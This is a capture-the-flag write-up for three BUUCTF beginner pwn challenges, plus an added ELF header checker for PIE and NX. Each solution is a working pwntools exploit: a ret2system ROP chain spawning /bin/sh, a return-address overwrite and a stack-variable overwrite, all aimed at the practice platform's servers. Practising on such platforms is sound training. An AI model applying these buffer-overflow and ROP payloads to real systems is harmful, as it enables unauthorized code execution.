Practice platform: Buuctf
RIP
Debugged in gdb. There is no PIE, so the gets overflow is used directly and pop rdi ; ret controls the argument for ret2system (this is more complicated than needed: a look in IDA shows that just controlling the return flow is enough).
```python
from pwn import *
context.log_level = "debug"

io = remote('node4.buuoj.cn', 29531)
elf = ELF('./pwn1')

pop_rdi_ret = 0x00000000004011fb              # pop rdi ; ret gadget (fixed address, no PIE)
sh_addr = next(elf.search(b'/bin/sh'))        # "/bin/sh" string present in the binary
ret = pop_rdi_ret + 1                         # bare `ret` (skips the pop), keeps the stack 16-byte aligned before system()
system_addr = elf.symbols['system']

print("[+] sh addr: {}".format(hex(sh_addr)))
print("[+] system addr: {}".format(hex(system_addr)))

# 23 bytes of padding reach the saved return address, then the ROP chain
payload = b'A' * 23 + p64(pop_rdi_ret) + p64(sh_addr) + p64(ret) + p64(system_addr)
io.send(payload)
io.interactive()
```
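Added example, not from this writeup: a header-level check, without pwntools, that reads off the two properties the note above relies on, "no PIE" (e_type is ET_EXEC rather than ET_DYN) and NX (the PT_GNU_STACK segment lacks PF_X). It runs on a constructed minimal ELF64 image built inline; a canary check needs the symbol table and is left out.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3            # fixed-address executable / position-independent (PIE or .so)
PT_GNU_STACK = 0x6474E551         # segment whose p_flags describe the stack's permissions
PF_X = 0x1
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr


def elf_mitigations(data: bytes) -> dict:
    """Report PIE and NX for a little-endian ELF64 image held in memory."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    fields = EHDR.unpack_from(data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = fields[1], fields[5], fields[9], fields[10]
    # Conservative default: without PT_GNU_STACK, do not assume the stack is non-executable.
    nx = False
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(data, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    # A PIE is linked as ET_DYN; a plain ET_EXEC binary keeps its addresses
    # fixed, which is why the writeup can hard-code 0x4011fb for the gadget.
    return {"pie": e_type == ET_DYN, "nx": nx}


def build_sample(e_type: int, stack_flags: int) -> bytes:
    """Constructed test image: an ELF64 header followed by one PT_GNU_STACK entry."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8   # 64-bit, LE, version 1, SysV ABI
    ehdr = EHDR.pack(ident, e_type, 0x3E, 1, 0x401000, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 1, 0, 0, 0)
    phdr = PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    # Constructed samples: no PIE with an rw- stack, then a PIE with an rwx stack.
    print(elf_mitigations(build_sample(ET_EXEC, 0x6)))   # {'pie': False, 'nx': True}
    print(elf_mitigations(build_sample(ET_DYN, 0x7)))    # {'pie': True, 'nx': False}
```

On a real binary, read the file with `open(path, "rb").read()` and pass the bytes to `elf_mitigations`; pwntools' `ELF(path).pie` and `.nx` report the same two bits.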
warmup_csaw_2016
Control the return address to read the flag directly.
```python
from pwn import *
context.log_level = "debug"

io = remote('node4.buuoj.cn', 29490)
elf = ELF('./warmup_csaw_2016')

io.recvuntil(b"WOW:")
cat_flag_addr = int(io.recv(8), 16)           # the program prints the address of the flag-reading function
io.send(b'A' * 0x48 + p64(cat_flag_addr))     # 0x40 buffer + 8 bytes saved rbp, then the return address
io.interactive()
```
ciscn_2019_n_1
Needs a gets overflow to overwrite the value of v2 on the stack.
```python
from pwn import *
context.log_level = "debug"

io = remote('node4.buuoj.cn', 29083)

v2 = 0x41348000                               # IEEE-754 single-precision encoding of 11.28125
io.recvuntil(b"number.\n")
io.sendline(b"A" * (0x30 - 0x4) + p64(v2))    # v1 sits at rbp-0x30, v2 at rbp-0x4
io.recv()
io.interactive()
```